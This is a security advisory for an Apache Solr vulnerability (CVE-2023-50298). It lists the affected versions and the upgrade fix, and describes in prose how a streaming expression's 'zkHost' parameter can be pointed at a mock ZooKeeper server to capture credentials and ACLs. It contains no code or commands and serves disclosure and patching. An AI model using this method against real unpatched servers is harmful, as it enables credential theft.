Severity: low
Affected versions:
- Apache Solr 6.0.0 through 8.11.2
- Apache Solr 9.0.0 before 9.4.1
Description:
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr.This issue affects Apache Solr:
from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1.
Solr Streaming Expressions allows users to extract data from other Solr Clouds, using a "zkHost" parameter.
When original SolrCloud is setup to use ZooKeeper credentials and ACLs, they will be sent to whatever "zkHost" the user
provides.
An attacker could setup a server to mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs and
extracts the sensitive information,
then send a streaming expression using the mock server's address in "zkHost".
Streaming Expressions are exposed via the "/streaming" handler, with "read" permissions.
Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.
This issue is being tracked as SOLR-17098
Credit:
Qing Xu (reporter)
References:
https://solr.staged.apache.org/security.html#cve-2023-50298-apache-solr-can-expose-zookeeper-credentials-via-streaming-expressions
https://solr.apache.org
https://www.cve.org/CVERecord?id=CVE-2023-50298
https://issues.apache.org/jira/browse/SOLR-17098